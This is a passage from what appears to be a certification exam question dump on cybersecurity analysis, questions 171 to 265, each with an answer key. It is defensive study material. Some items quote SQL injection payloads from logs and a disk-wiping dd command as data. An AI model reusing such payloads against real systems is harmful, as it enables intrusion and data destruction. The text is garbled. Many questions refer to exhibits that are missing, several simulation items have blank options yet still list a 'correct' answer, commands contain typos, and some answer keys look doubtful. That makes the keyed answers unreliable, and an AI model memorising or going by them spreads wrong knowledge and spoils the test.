A. Extract the hard drives from the compromised machines and then plug them into a forensics machine to apply encryption over the stored data to
protect it from nonauthorized access.
B. Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
C. Perform a disk sanitization using the command #dd if=/dev/zero of=/dev/sdc bs=1M over the media that will receive a copy of the collected data.
D. Execute the command #dd if-/dev/sda of=/dev/sdc bs=512 to clone the evidence data to external media to prevent any further change.
Correct Answer: B
QUESTION 172
An organization needs to limit its exposure to accidental disclosure when employees send emails that contain personal information to recipients outside
the company. Which of the following technical controls would BEST accomplish this goal?
A. DLP
B. Encryption
C. Data masking
D. SPF
Correct Answer: A
QUESTION 173
A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed,
and no additional security controls have been implemented. Which of the following should the analyst review FIRST?
A. The DNS configuration

B. Privileged accounts
C. The IDS rule set
D. The firewall ACL
Correct Answer: C
QUESTION 174
Which of the following is an advantage of SOAR over SIEM?
A. SOAR is much less expensive.

B. SOAR reduces the amount of human intervention required.
C. SOAR can aggregate data from many sources.
D. SOAR uses more robust encryption protocols.
Correct Answer: B
QUESTION 175
A company uses an FTP server to support its critical business functions. The FTP server is configured as follows:
The FTP service is running with the data directory configured in /opt/ftp/data. The FTP server hosts employees' home directories in /home. Employees
may store sensitive information in their home directories. An IoC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of
the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?
A. Implement file-level encryption of sensitive files.

B. Reconfigure the FTP server to support FTPS.
C. Run the FTP server in a chroot environment.
D. Upgrade the FTP server to the latest version.
Correct Answer: C
QUESTION 176
A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that
contain SPI. Prior to the deployment, the analyst should conduct:
A. a tabletop exercise.
B. a business impact analysis.
C. a PCI assessment.
D. an application stress test
Correct Answer: B
QUESTION 177
A product security analyst has been assigned to evaluate and validate a new product's security capabilities. Part of the evaluation involves reviewing
design changes at specific intervals for security deficiencies, recommending changes, and checking for changes at the next checkpoint. Which of the
following BEST describes the activity being conducted?
A. User acceptance testing

B. Stress testing
C. Code review
D. Security regression testing
Correct Answer: D
QUESTION 178
A software developer is correcting the error-handling capabilities of an application following the initial coding of the fix. Which of the following would the
software developer MOST likely perform to validate the code prior to pushing it to production?
A. Web-application vulnerability scan

B. Static analysis
C. Packet inspection
D. Penetration test
Correct Answer: B
QUESTION 179
A security analyst observes a large amount of scanning activity coming from an IP address outside the organization's environment. Which of the
following should the analyst do to block this activity?
A. Create an IPS rule to block the subnet.

B. Sinkhole the IP address.
C. Create a firewall rule to block the IP address.
D. Close all unnecessary open ports.
Correct Answer: C
QUESTION 180
During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring tool about files
from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?
A. Warn the incident response team that the server can be compromised.
B. Open a ticket informing the development team about the alerts.
C. Check if temporary files are being monitored.
D. Dismiss the alert, as the new application is still being adapted to the environment.
Correct Answer: C
QUESTION 181
A security analyst has received a report that servers are no longer able to connect to the network. After many hours of troubleshooting, the analyst
determines a Group Policy Object is responsible for the network connectivity issues. Which of the following solutions should the security analyst
recommend to prevent an interruption of service in the future?
A. CI/CD pipeline
B. Impact analysis and reporting
C. Appropriate network segmentation
D. Change management process
Correct Answer: D
QUESTION 182
HOTSPOT -
A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed
and if a false positive occurred for each device.
INSTRUCTIONS -
Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a
compliance scan. For ONLY the credentialed and non-credentialed scans, evaluate the results for False Positives and check the Findings that display
false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.
Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results. The Linux Web Server, File-Print Server,
and Directory Server are draggable.
Hot Area:
A.
B.
C.
D.
Correct Answer: A
QUESTION 183
SIMULATION -
Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the help desk ticket queue.
INSTRUCTIONS -
Click on the ticket to see the ticket details. Additional content is available on tabs within the ticket.
First, select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from second drop-down menu.

Issue - High memory Utilization -
Caused by - wuaucit.exe -
Refer below Image.
B.
C.
D.
Correct Answer: A
QUESTION 184
An organization has the following policies:
Services must run on standard ports.
Unneeded services must be disabled.
The organization has the following servers:
192.168.10.1 - web server
192.168.10.2 - database server
A security analyst runs a scan on the servers and sees the following output:
Which of the following actions should the analyst take?
A. Disable HTTPS on 192.168.10.1.

B. Disable IIS on 192.168.10.1.
C. Disable DNS on 192.168.10.2.
D. Disable MSSQL on 192.168.10.2.
E. Disable SSH on both servers.
Correct Answer: C
QUESTION 185
An analyst performs a routine scan of a host using Nmap and receives the following output:
Which of the following should the analyst investigate FIRST?
A. Port 21
B. Port 22
C. Port 23
D. Port 80
Correct Answer: C
QUESTION 186
A security analyst received a series of antivirus alerts from a workstation segment, and users reported ransomware messages. During lessons-learned
activities, the analyst determines the antivirus was able to alert to abnormal behavior but did not stop this newest variant of ransomware. Which of the
following actions should be taken to BEST mitigate the effects of this type of threat in the future?
A. Enabling sandboxing technology

B. Purchasing cyber insurance
C. Enabling application blacklisting

D. Installing a firewall between the workstations and internet
Correct Answer: A
QUESTION 187
Which of the following will allow different cloud instances to share various types of data with a minimal amount of complexity?
A. Reverse engineering
B. Application log collectors
C. Workflow orchestration
D. API integration
E. Scripting
Correct Answer: D
QUESTION 188
The Chief Information Officer (CIO) of a large healthcare institution is concerned about all machines having direct access to sensitive patient
information. Which of the following should the security analyst implement to BEST mitigate the risk of sensitive data exposure?
A. A cloud access service broker system

B. NAC to ensure minimum standards are met
C. MFA on all workstations
D. Network segmentation
Correct Answer: D
QUESTION 189
A security analyst notices the following entry while reviewing the server logs:
OR 1=1' ADD USER attacker' PW 1337password' --
Which of the following events occurred?
A. CSRF
B. XSS
C. SQLi
D. RCE
Correct Answer: C
QUESTION 190
Due to continued support of legacy applications, an organization's enterprise password complexity rules are inadequate for its required security posture.
Which of the following is the BEST compensating control to help reduce authentication compromises?
A. Smart cards
B. Multifactor authentication
C. Biometrics
D. Increased password-rotation frequency
Correct Answer: B
QUESTION 191
Which of the following BEST explains the function of a managerial control?
A. To help design and implement the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To create data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails
Correct Answer: C
QUESTION 192
A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture:
Which of the following generated the above output?
A. A port scan
B. A TLS connection
C. A vulnerability scan
D. A ping sweep
Correct Answer: A
QUESTION 193
Which of the following are considered PII by themselves? (Choose two.)
A. Government ID
B. Job title
C. Employment start date
D. Birth certificate
E. Employer address
F. Mother's maiden name
Correct Answer: AD
QUESTION 194
An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been
compromised. Which of the following should the analyst do FIRST?
A. Perform threat hunting in other areas of the cloud infrastructure.

B. Contact law enforcement to report the incident.
C. Perform a root cause analysis on the container and the service logs.
D. Isolate the container from production using a predefined policy template.
Correct Answer: D
QUESTION 195
Which of the following data security controls would work BEST to prevent real PII from being used in an organization's test cloud environment?
A. Encryption
C. Data masking
D. Digital rights management
E. Access control
Correct Answer: C
QUESTION 196
SIMULATION -
You are a cybersecurity analyst tasked with interpreting scan data from Company A's servers. You must verify the requirements are being met for all of
the servers and recommend changes if you find they are not.
The company's hardening guidelines indicate the following:
· TLS 1.2 is the only version of TLS running.

· Apache 2.4.18 or grater should be used.
· Only default ports should be used
INSTRUCTIONS -
Using the supplied data, record the status of compliance with the company's guidelines for each server.
The question contains two parts; make sure you complete Part1 and Part2. Make recommendations for issues based ONLY on the hardening guidelines
provided.
A. Answer: AppServ1 is only using TLS.1.2 -

AppServ4 is only using TLS.1.2 -
AppServ1 is using Apache 2.4.18 or greater
Recommendation is to disable TLS v1.1 on AppServ2 and AppServ3. Also upgrade AppServ2 Apache to version 2.4.48 from its current version of
2.3.48
B.
C.
D.
Correct Answer: A
QUESTION 197
A security team wants to make SaaS solutions accessible from only the corporate campus. Which of the following would BEST accomplish this goal?
A. Geotagging
B. IP restrictions
C. Reverse proxy
D. Single sign-on
Correct Answer: C
QUESTION 198
A security analyst receives an alert to expect increased and highly advanced cyberattacks originating from a foreign country that recently had sanctions
implemented. Which of the following describes the type of threat actors that should concern the security analyst?
A. Insider threat
B. Nation-threat
C. Hacktivist
D. Organized crime
Correct Answer: B
QUESTION 199
When attempting to do a stealth scan against a system that does not respond to ping, which of the following Nmap commands BEST accomplishes that
goal?
A. nmap sA O -noping
B. nmap sT O -Pn
C. nmap sS O -Pn
D. nmap sQ O -Pn
Correct Answer: C
QUESTION 200
A security analyst reviews SIEM logs and detects a well-known malicious executable running in a Windows machine. The up-to-date antivirus cannot
detect the malicious executable. Which of the following is the MOST likely cause of this issue?
A. The malware fileless and exists only in physical memory.

B. The malware detects and prevents its own execution in a virtual environment
C. The antivirus does not have the malware's signature.
D. The malware is being executed with administrative privileges.
Correct Answer: A
QUESTION 201
A proposed network architecture requires systems to be separated from each other logically based on defined risk levels. Which of the following
explains the reason why an architect would set up the network this way?
A. To complicate the network and frustrate a potential malicious attacker

B. To create a design that simplifies the supporting network
C. To reduce the attack surface of those systems by segmenting the network based on risk
D. To reduce the number of IP addresses that are used on the network
Correct Answer: C
QUESTION 202
An organization has the following risk mitigation policy:
· Risks with a probability of 95% or greater will be addressed before all others regardless of the impact.
· All other prioritization will be based on risk value.
The organization has identified the following risks:
Which of the following is the order of priority for risk mitigation from highest to lowest?
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
Correct Answer: B
QUESTION 203
A financial institution's business unit plans to deploy a new technology in a manner that violates existing information security standards. Which of the
following actions should the Chief Information Security Officer (CISO) take to manage any type of violation?
A. Enforce the existing security standards and controls.

B. Perform a risk analysis and qualify the risk with legal.
C. Perform research and propose a better technology.
D. Enforce the standard permits.
Correct Answer: B
QUESTION 204
To validate local system-hardening requirements, which of the following types of vulnerability scans would work BEST to verify the scanned device
meets security policies?
A. SCAP
B. SAST
C. DAST
D. DACS
Correct Answer: A
QUESTION 205
An organization that uses SPF has been notified emails sent via its authorized third-party partner are getting rejected. A security analyst reviews the
DNS entry and sees the following:
The organization's primary mail server IP is 180.10.6.6 and the secondary mail server IP is 180.10.6.5. The organization's third-party mail provider is
"Robust Mail" with the domain name robustmail.com. Which of the following is the MOST likely reason for the rejected emails?
A. SPF version 1 does not support third-party providers.

B. The primary and secondary email server IP addresses are out of sequence.
C. An incorrect IP version is being used.
D. The wrong domain name is in the SPF record.
Correct Answer: D
QUESTION 206
Which of the following sources would a security analyst rely on to provide relevant and timely threat information concerning the financial services
industry?
A. Real-time and automated firewall rules subscriptions

B. Open-source intelligence, such as social media and blogs
C. Information sharing and analysis membership
D. Common vulnerability and exposure bulletins
Correct Answer: C
QUESTION 207
A host is spamming the network unintentionally. Which of the following control types should be used to address this situation?
A. Managerial
B. Technical
C. Operational
D. Corrective
Correct Answer: D
QUESTION 208
A company has contracted with a software development vendor to design a web portal for customers to access a medical records database. Which of
the following should the security analyst recommend to BEST control the unauthorized disclosure of sensitive data when sharing the development
database with the vendor?
A. Establish an NDA with the vendor.

B. Enable data masking of sensitive data tables in the database.
C. Set all database tables to read only.
D. Use a de-identified data process for the development database.
Correct Answer: B
QUESTION 209
When investigating a compromised system, a security analyst finds the following script in the /tmp directory:
Which of the following attacks is this script attempting, and how can it be mitigated?
A. This is a password-hijacking attack, and it can be mitigated by using strong encryption protocols.
B. This is a password-spraying attack, and it can be mitigated by using multifactor authentication
C. This is a password-dictionary attack, and it can be mitigated by forcing password changes every 30 day.
D. This is a credential-stuffing attack, and it can be mitigated by using multistep authentication.
Correct Answer: B
QUESTION 210
An organization supports a large number of remote users. Which of the following is the BEST option to protect the data on the remote users' laptops?
A. Require the use of VPNs.

B. Require employees to sign an NDA
C. Implement a DLP solution.
D. Use whole disk encryption.
Correct Answer: D
QUESTION 211
A company recently experienced financial fraud, which included shared passwords being compromised and improper levels of access being granted.
The company has asked a security analyst to help improve its controls. Which of the following will MOST likely help the security analyst develop better
controls?
A. An evidence summarization
B. An incident response plan
C. A lessons-learned report
D. An indicator of compromise
Correct Answer: C
QUESTION 212
A company uses self-signed certificates when sending emails to recipients within the company. Users are calling the help desk because they are getting
warnings when attempting to open emails sent by internal users. A security analyst checks the certificates and sees the following
Which of the following should the security analyst conclude?
A. user@company.com is a malicious insider.

B. The valid dates are too far apart and are generating the alerts
C. certServer has been compromised
D. The root certificate was not installed in the trusted store.
Correct Answer: D
QUESTION 213
A company's security administrator needs to automate several security processes related to testing for the existence of changes within the environment.
Conditionally, other processes will need to be created based on input from prior processes. Which of the following is the BEST method for
accomplishing this task?
A. Machine learning and process monitoring

B. Continuous integration and configuration management
C. API integration and data enrichment
D. Workflow orchestration and scripting
Correct Answer: D
QUESTION 214
A company recently experienced similar network attacks. To determine whether the attacks were identical, the company should gather a list of IPs
domains, and files and use:
A. behavior data
B. the Diamond Model of Intrusion Analysis.
C. the attack kill chain.
D. the reputational data.
Correct Answer: B
QUESTION 215
A security analyst receives a CVE bulletin, which lists several products that are used in the enterprise. The analyst immediately deploys a critical security
patch. Which of the following BEST describes the reason for the analyst's immediate action?
A. Nation-state hackers are targeting the region.

B. A new vulnerability was discovered by a vendor.
C. A known exploit was discovered.
D. A new zero-day threat needs to be addressed.
E. There is an insider threat.
Correct Answer: C
QUESTION 216
A company recently hired a new SOC provider and implemented new incident response procedures. Which of the following conjoined approaches would
MOST likely be used to evaluate the new implementations for monitoring and incident response at the same time? (Choose two.)
A. Blue-team exercise
B. Disaster recovery exercise
C. Red-team exercise
D. Gray-box penetration test
E. Tabletop exercise
F. Risk assessment
Correct Answer: AE
QUESTION 217
An organization wants to move non-essential services into a cloud computing environment. Management has a cost focus and would like to achieve a
recovery time objective of 12 hours. Which of the following cloud recovery strategies would work BEST to attain the desired outcome?
A. Duplicate all services in another instance and load balance between the instances,
B. Establish a hot site with active replication to another region within the same cloud provider.
C. Set up a warm disaster recovery site with the same cloud provider in a different region.
D. Configure the systems with a cold site at another cloud provider that can be used for failover.
Correct Answer: C
QUESTION 218
Portions of a legacy application are being refactored to discontinue the use of dynamic SQL. Which of the following would be BEST to implement in the
legacy application?
A. Input validation
B. SQL injection
C. Parameterized queries
D. Web-application firewall
E. Multifactor authentication
Correct Answer: C
QUESTION 219
An international company is implementing a marketing campaign for a new product and needs a security analyst to perform a threat-hunting process to
identify possible threat actors. Which of the following should be the analyst's primary focus?
A. Hacktivists
B. Organized crime
C. Nation-states
D. Insider threats
Correct Answer: B
QUESTION 220
In web application scanning, static analysis refers to scanning:
A. the system for vulnerabilities before installing the application

B. the compiled code of the application to detect possible issues.
C. an application that is installed and active on a system.
D. an application that is installed on a system that is assigned a static IP.
Correct Answer: B
QUESTION 221
A security team identified some specific known tactics and techniques to help mitigate repeated credential access threats, such as account manipulation
and brute forcing. Which of the flowing frameworks or models did the security team MOST likely use to identify the tactics and techniques?
A. MITRE ATT&CK
B. ITIL
C. Kill chain
D. Diamond Model of intrusion Analysis
Correct Answer: A
QUESTION 222
A security analyst is reviewing the following requirements for new time clocks that will be installed in a shipping warehouse:
· The clocks must be configured so they do not respond to ARP broadcasts. · The server must be configured with static ARP entries for each clock.
Which of the following types of attacks will this configuration mitigate?
A. Spoofing
B. Overflows
C. Rootkits
D. Sniffing
Correct Answer: A
QUESTION 223
A user receives a potentially malicious attachment that contains spelling errors and a PDF document. A security analyst reviews the email and decides
to download the attachment to a Linux sandbox for review. Which of the following commands would MOST likely indicate if the email is malicious?
A. sha256sum ~/Desktop/file.pdf
B. file ~/Desktop/file.pdf
C. strings ~/Desktop/file.pdf | grep i "<="" li="">
D. cat < ~/Desktop/file.pdf | grep i .exe
Correct Answer: C
QUESTION 224
A user reports a malware alert to the help desk. A technician verifies the alert, determines the workstation is classified as a low-severity device, and
uses network controls to block access. The technician then assigns the ticket to a security analyst who will complete the eradication and recovery
processes. Which of the following should the security analyst do NEXT?
A. Document the procedures and walkthrough the incident training guide

B. Reverse engineer the malware to determine its purpose and risk to the organization
C. Sanitize the workstation and verify countermeasures are restored
D. Isolate the workstation and issue a new computer to the user
Correct Answer: C
QUESTION 225
A security analyst discovers the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can
access it. Which of the following threats applies to this situation?
A. Potential data loss to external users

B. Loss of public/private key management
C. Cloud-based authentication attack
D. Insufficient access logging
Correct Answer: A
QUESTION 226
A security analyst is probing a company's public-facing servers for vulnerabilities and obtains the following output:
Which of the following changes should the analyst recommend FIRST?
A. Implement File Transfer Protocol Secure on the upload server.
B. Disable anonymous login on the web server.

C. Configure firewall changes to close port 445 on 124.45.23.112.
D. Apply a firewall rule to filter the number of requests per second on port 80 on 124.45.23.108.
Correct Answer: C
QUESTION 227
A company that uses email for all internal and external communications received a legal notice from a vendor that was disputing a contract award. The
company needs to implement ta legal hold on the email of users who were involved in the vendor selection process and the awarding of the contract.
Which of the following describes the appropriate steps that should be taken to comply with the legal notice?
A. Notify the security team of the legal hold and remove user access to the email accounts.
B. Coordinate with legal counsel and then not the security team to ensure the appropriate email accounts are frozen.
C. Disable the user accounts that are associated with the legal hold and create new user accounts so they can continue doing business.
D. Encrypt messages that are associated with the legal hold and initiate a chain of custody to ensure admissibility in future legal proceedings.
Correct Answer: B
QUESTION 228
A penetration tester physically enters a datacenter and attaches a small device to a switch. As part of the tester's effort to evaluate which nodes are
present on the network; the tester places the network agape in promiscuous mode and logs traffic for later analysis. Which of the following is the tester
performing?
A. Credential scanning
B. Passive scanning
C. Protocol analysis
D. SCAP scanning
E. Network segmentation
Correct Answer: B
QUESTION 229
While reviewing a cyber-risk assessment, an analyst notes there are concerns related to FPGA usage. Which of the following statements would BEST
convince the analyst's supervisor to use additional controls?
A. FPGAs are expensive and can only be programmed once. Code deployment safeguards are needed.
B. FPGAs have an inflexible architecture; Additional training for developers is needed.
C. FPGAs are vulnerable to malware installation and require additional protections for their codebase.
D. FPGAs are expensive to produce. Anti-counterfeiting safeguards are needed.
Correct Answer: C
QUESTION 230
Which of the following BEST explains hardware root of trust?
A. It uses the processor security extensions to protect the OS from malicious software installation.
B. It prevents side-channel attacks that can take advantage of speculative execution vulnerabilities.
C. It ensures the authenticity of firmware and software during the boot process until the OS is loaded.
D. It has been implemented as a mitigation to the Spectre and Meltdown hardware vulnerabilities.
Correct Answer: C
QUESTION 231
A code review reveals a web application is using time-based cookies for session management. This is a security concern because time-based cookies
are easy to:
A. parameterize
B. decode
C. guess
D. decrypt
Correct Answer: C
QUESTION 232
A company's legal department is concerned that its incident response plan does not cover the countless ways security incidents can occur. They have
asked a security analyst to help tailor the response plan to provide broad coverage for many situations. Which of the following is the BEST way to
achieve this goal?
A. Focus on incidents that have a high chance of reputation harm.

B. Focus on common attack vectors first.
C. Focus on incidents that affect critical systems.
D. Focus on incidents that may require law enforcement support
Correct Answer: B
QUESTION 233
A security engineer must deploy X 509 certificates to two web servers behind a load balancer. Each web server is configured identically. Which of the
following should be done to ensure certificate name mismatch errors do not occur?
A. Create two certificates, each with the same fully qualified domain name, and associate each with the web servers' real IP addresses on the load
balancer.
B. Create one certificate on the load balancer and associate the site with the web servers' real IP addresses.
C. Create two certificates, each with the same fully qualified domain name, and associate each with a corresponding web server behind the load
balancer.
D. Create one certificate and export it to each web server behind the load balancer.
Correct Answer: C
QUESTION 234
An organization is experiencing issues with emails that are being sent to external recipients. Incoming emails to the organization are working fine. A
security analyst receives the following screenshot of an email error from the help desk:
The analyst then checks the email server and sees many of the following messages in the logs:
Which of the following is MOST likely the issue?
A. SPF is failing.
B. The DMARC queue is full.
C. The DKIM private key has expired.
D. Port 25 is not open.
Correct Answer: A
QUESTION 235
The threat intelligence department recently learned of an advanced persistent threat that is leveraging a new strain of malware, exploiting a system
router. The company currently uses the same device mentioned in the threat report. Which of the following configuration changes would BEST improve
the organization's security posture?
A. Implement an IPS rule that contains content for the malware variant and patch the routers to protect against the vulnerability.
B. Implement an IDS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability.
C. Implement an IPS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability.
D. Implement an IDS rule that contains content for the malware variant and patch the routers to protect against the vulnerability
Correct Answer: A
QUESTION 236
A security analyst wants to capture large amounts of network data that will be analyzed at a later time. The packet capture does not need to be in a
format that is readable by humans, since it will be put into a binary file called "packetCapture ". The capture must be as efficient as possible, and the
analyst wants to minimize the likelihood that packets will be missed. Which of the following commands will BEST accomplish the analyst's objectives?
A. tcpdump -w packetCapture
B. tcpdump -a packetCapture
C. tcpdump -n packetCapture
D. nmap -v > packetCapture
E. nmap -oA > packetCapture
Correct Answer: A
QUESTION 237
A security analyst needs to assess the web-server versions on a list of hosts to determine which are running a vulnerable version of the software and
then output that list into an XML file named webserverlist.xml. The host list is provided in a file named webserverlist.txt. Which of the following Nmap
commands would BEST accomplish this goal?
A. nmap iL webserverlist.txt sC p 443 oX webserverlist.xml

B. nmap iL webserverlist.txt sV p 443 oX webserverlist.xml
C. nmap iL webserverlist.txt F p 443 oX weberserverlist.xml
D. nmap --takefile webserverlist.txt --outputfileasXML webserverlist.xml --scanports
Correct Answer: B
QUESTION 238
A company creates digitally signed packages for its devices. Which of the following BEST describes the method by which the security packages are
delivered to the company's customers?
A. Anti-tamper mechanism
B. SELinux
C. Trusted firmware updates
D. eFuse
Correct Answer: C
QUESTION 239
A small marketing firm uses many SaaS applications that hold sensitive information. The firm has discovered terminated employees are retaining
access to systems for many weeks after their end date. Which of the following would BEST resolve the issue of lingering access?
A. Perform weekly manual reviews on system access to uncover any issues.

B. Set up a privileged access management tool that can fully manage privileged account access.
C. Implement MFA on cloud-based systems.
D. Configure federated authentication with SSO on cloud provider systems.
Correct Answer: B
QUESTION 240
A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system. After several attempts to remediate the
issue, the system went down. A root cause analysis revealed a bad actor forced the application to not reclaim memory. This caused the system to be
depleted of resources. Which of the following BEST describes this attack?
A. Injection attack
B. Memory corruption
C. Denial of service
D. Array attack
Correct Answer: C
QUESTION 241
A company's change management team has asked a security analyst to review a potential change to the email server before itis released into
production. The analyst reviews the following change request:
Change request date: 2020-01-30 -

Change requester. Cindy Richardson
Change asset: WIN2K-EMAILOOI -

Change requested: Modify the following SPF record to change +all to all
Which of the following is the MOST likely reason for the change?
A. To reject email from servers that are not listed in the SPF record
B. To reject email from email addresses that are not digitally signed
C. To accept email to the company's domain
D. To reject email from users who are not authenticated to the network
Correct Answer: A
QUESTION 242
Which of the following can detect vulnerable third-party libraries before code deployment?
A. Impact analysis
B. Dynamic analysis
C. Static analysis
D. Protocol analysis
Correct Answer: C
QUESTION 243
Which of the following are the MOST likely reasons to include reporting processes when updating an incident response plan after a breach? (Choose
two.)
A. To establish a clear chain of command

B. To meet regulatory requirements for timely reporting
C. To limit reputation damage caused by the breach
D. To remediate vulnerabilities that led to the breach
E. To isolate potential insider threats
F. To provide secure network design changes
Correct Answer: AB
QUESTION 244
A security analyst is reviewing existing email protection mechanisms to generate a report.
The analysis finds the following DNS records:
Record 1 -
v=spf1 ip4:192:168.0.0/16 include:_spf.marketing.com include: thirdpartyprovider.com ~all
Record 2 -
"v=DKIM1\ k=rsa\;
p=MIGfMA0GCSqh7d8hyh78Gdg87gd98hag86ga98dhay8gd7ashdca7yg79auhudig7df9ah8 g76ag98dhay87ga9"
Record 3 -
_dmarc.comptia.com TXT v=DMARC1\; p=reject\; pct=100; rua=mailto:dmarc- reports@comptia.com
Which of the following options provides accurate information to be included in the report?
A. Record 3 serves as a reference of the security features configured at Record 1 and 2.

B. Record 1 is used as a blocklist mechanism to filter unauthorized senders.
C. Record 2 is used as a key to encrypt all outbound messages sent.
D. The three records contain private information that should not be disclosed.
Correct Answer: B
QUESTION 245
An organization has a policy that requires servers to be dedicated to one function and unneeded services to be disabled. Given the following output from
an Nmap scan of a web server:
Which of the following ports should be closed?
A. 22
B. 80
C. 443
D. 1433
Correct Answer: D
QUESTION 246
A security analyst is reviewing WAF alerts and sees the following request:
Request="GET /public/report.html?iewt=9064 AND 1=1 UNION ALL SELECT 1,NULL,table_name FROM information_schema.tables WHERE 2>1--/**/;
HTTP/1.1 Host=mysite.com
Which of the following BEST describes the attack?
A. SQL injection
B. LDAP injection
C. Command injection
D. Denial of service
Correct Answer: A
QUESTION 247
Clients are unable to access a company's API to obtain pricing data. An analyst discovers sources other than clients are scraping the API for data, which
is causing the servers to exceed available resources. Which of the following would be BEST to protect the availability of the APIs?
A. IP whitelisting
B. Certificate-based authentication
C. Virtual private network
D. Web application firewall
Correct Answer: D
QUESTION 248
A security analyst needs to determine the best method for securing access to a top-secret datacenter. Along with an access card and PIN code, which of
the following additional authentication methods would be BEST to enhance the datacenter's security?
A. Physical key
B. Retinal scan
C. Passphrase
D. Fingerprint
Correct Answer: B
QUESTION 249
A user's computer has been running slowly when the user tries to access web pages. A security analyst runs the command netstat -aon from the
command line and receives the following output:
Which of the following lines indicates the computer may be compromised?
A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6
Correct Answer: C
QUESTION 250
Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the
value of:
A. vulnerability scanning.
B. threat hunting.
C. red teaming.
D. penetration testing.
Correct Answer: B
QUESTION 251
An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data,
including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer

B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Correct Answer: D
QUESTION 252
A remote code execution vulnerability was discovered in the RDP. An organization currently uses RDP for remote access to a portion of its VDI
environment. The analyst verified network-level authentication is enabled. Which of the following is the BEST remediation for this vulnerability?
A. Verify the threat intelligence feed is updated with the latest solutions.
B. Verify the system logs do not contain indicators of compromise.
C. Verify the latest endpoint-protection signature is in place.
D. Verify the corresponding patch for the vulnerability is installed.
Correct Answer: D
QUESTION 253
An information security analyst observes anomalous behavior on the SCADA devices in a power plant. This behavior results in the industrial generators
overheating and destabilizing the power supply. Which of the following would BEST identify potential indicators of compromise?
A. Use Burp Suite to capture packets to the SCADA device's IP.

B. Use tcpdump to capture packets from the SCADA device IP.
C. Use Wireshark to capture packets between SCADA devices and the management system.
D. Use Nmap to capture packets from the management system to the SCADA devices.
Correct Answer: C
QUESTION 254
An organization wants to implement a privileged access management solution to better manage the use of emergency and privileged service accounts.
Which of the following would BEST satisfy the organization's goal?
A. Access control lists

B. Discretionary access controls
C. Policy-based access controls
D. Credential vaulting
Correct Answer: C
QUESTION 255
During a cyber incident, which of the following is the BEST course of action?
A. Switch to using a preapproved, secure, third-party communication system.

B. Keep the entire company informed to ensure transparency and integrity during the incident.
C. Restrict customer communication until the severity of the breach is confirmed.
D. Limit communications to preauthorized parties to ensure response efforts remain confidential.
Correct Answer: D
QUESTION 256
Legacy medical equipment, which contains sensitive data, cannot be patched. Which of the following is the BEST solution to improve the equipment's
security posture?
A. Move the legacy systems behind a WAF

B. Implement an air gap for the legacy systems
C. Place the legacy systems in the perimeter network
D. Implement a VPN between the legacy systems and the local network
Correct Answer: B
QUESTION 257
Which of the following BEST explains the function of a managerial control?
A. To scope the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To implement data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails
Correct Answer: C
QUESTION 258
Which of the following provides an automated approach to checking a system configuration?
A. SCAP
B. CI/CD
C. OVAL
D. Scripting
E. SOAR
Correct Answer: A
QUESTION 259
A digital forensics investigator works from duplicate images to preserve the integrity of the original evidence. Which of the following types of media are
MOST volatile and should be preserved? (Choose two.)
A. Memory cache
B. Registry file
C. SSD storage
D. Temporary filesystems
E. Packet decoding
F. Swap volume
Correct Answer: AD
QUESTION 260
A development team signed a contract that requires access to an on-premises physical server Access must be restricted to authorized users only and
cannot be connected to the internet Which of the following solutions would meet this requirement?
A. Establish a hosted SSO

B. Implement a CASB
C. Virtualize the server
D. Air gap the server
Correct Answer: D
QUESTION 261
After a breach involving the exfiltration of a large amount of sensitive data, a security analyst is reviewing the following firewall logs to determine how the
breach occurred.
Which of the following IP addresses does the analyst need to investigate further?
A. 192.168 1.1
B. 192.168.1.10
C. 192.168.1.12
D. 192.168 1.193
Correct Answer: C
QUESTION 262
A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program Which of the
following is the MOST appropriate product category for this purpose?
A. SCAP
B. SOAR
C. UEBA
D. WAF
Correct Answer: C
QUESTION 263
A security analyst discovers the company's website is vulnerable to cross-site scripting. Which of the following solutions will BEST remedy the
vulnerability?
A. Prepared statements
B. Server-side input validation
C. Client-side input encoding
D. Disabled JavaScript filtering
Correct Answer: B
QUESTION 264
During an audit, several customer order forms v/ere found to contain inconsistencies between the actual price of an item and the amount charged to the
customer. Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products.
Which of the following would be the BEST way to locate this issue?
A. Reduce the session timeout threshold.

B. Deploy MFA for access to the web server.
C. Implement input validation.
D. Run a static code scan.
Correct Answer: D
QUESTION 265
During a company's most recent incident, a vulnerability in custom software was exploited on an externally facing server by an APT. The lessons-
learned report noted the following:
· The development team used a new software language that was not supported by the security team's automated assessment tools.
